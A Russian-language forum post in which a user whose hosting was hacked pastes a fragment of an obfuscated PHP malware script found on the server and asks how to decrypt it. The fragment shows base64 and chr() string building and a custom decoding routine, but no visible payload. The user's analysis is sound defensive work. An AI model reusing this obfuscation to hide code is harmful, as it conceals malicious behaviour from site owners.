|
Расшифровка вредоносной программы на php
#38350154
Ссылка:
Ссылка на сообщение:
Ссылка с названием темы:
Ссылка на профиль пользователя:
|
|
|
|
Всем привет. Поломали тут хостинг и закинули скрипт на PHP, который весь наглухо зашифрована каким-то неизвестным мне бредогенератором. Имеет кучу строк, ниже часть из них. Кто подскажет чем ее так лихо зашифровали и где бы взять дешифратор? =) Цель - понять что скрипт делает, и откуда эта зараза пришла.
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
$mXD6kuhGw = array('Q29ud'.'GV'.'udC1Ue'.chr(88)."B".chr(108)."O".'i'.chr(66).chr(104)."c"."HBs"."aWN".'hdGl'.chr(118)."bi".'9'."6aXA=");$picties_0 = array('he'.chr(97)."der",chr(98).'W'.chr(86)."t"."b3J5".'X'.'2x'.chr(112).chr(98).'W'.chr(108).chr(48),"Ynpj".'b21wcm'."Vzcw==",'c2'.chr(70)."mZV9tb2"."Rl",'Ynpjb21wcmV'."zcw=".chr(61),"bWF4X2"."V4Z".'WN1d'."G"."lv"."b".'l90aW1l');$Manity_59 = array('or'.'d','b'.'cpowmod',"b".'c'.chr(109).'ul',"set_t"."im".chr(101)."_limi"."t","ZG".'VmYXVsdF9zb'.chr(50)."NrZ".chr(88)."R".chr(102)."d".'G'.'l'.chr(116).'ZW91dA'.chr(61)."=","pow","str".'l'.chr(101).'n',chr(98)."c"."add","MA=".'=');
$Unsexes = array('Ym'.'N'.chr(119).'b'.'3dtb2Q=','is_'.chr(99).'a'."l".chr(108)."a".chr(98).'le');
....
function Irlanges($Picte, $Overformible_94, $Formfuling2029)
{
$misexantes_39a = chr(98).'ase6'.chr(52).'_decode';
$Formitying = array("chr");
$Clos_21 = array(chr(111)."rd","p".chr(111).'w');
$formtioning42af = array("M"."A=".chr(61),"s"."u".'b'.chr(115)."tr",'s'."t"."r"."len");$Ownce = array('c'."ei"."l");
$ownive_a8 = '';
$subformivees = 3;
$Procesioned = $Ownce[0]($formtioning42af[2]($Picte) / $subformivees);
for($posibles = 0;
$posibles < $Procesioned; ++$posibles)
{
$Imlangies = $formtioning42af[1]($Picte, $posibles*$subformivees, $subformivees);
$pictiesf1 = $misexantes_39a($formtioning42af[0]);
for($h3d4Pdc = 0;
$h3d4Pdc < $formtioning42af[2]($Imlangies); ++$h3d4Pdc)
$pictiesf1 += ($Clos_21[0]($Imlangies[$h3d4Pdc]) + 1) * $Clos_21[1](256, $h3d4Pdc);
$pictiesf1 = Returning(Formsedfb2($pictiesf1, $Overformible_94, $Formfuling2029), 255);
$ownive_a8 .= $pictiesf1.$Formitying[0](255);
}
return $formtioning42af[1]($ownive_a8, 0, -1);
}
|
|
|
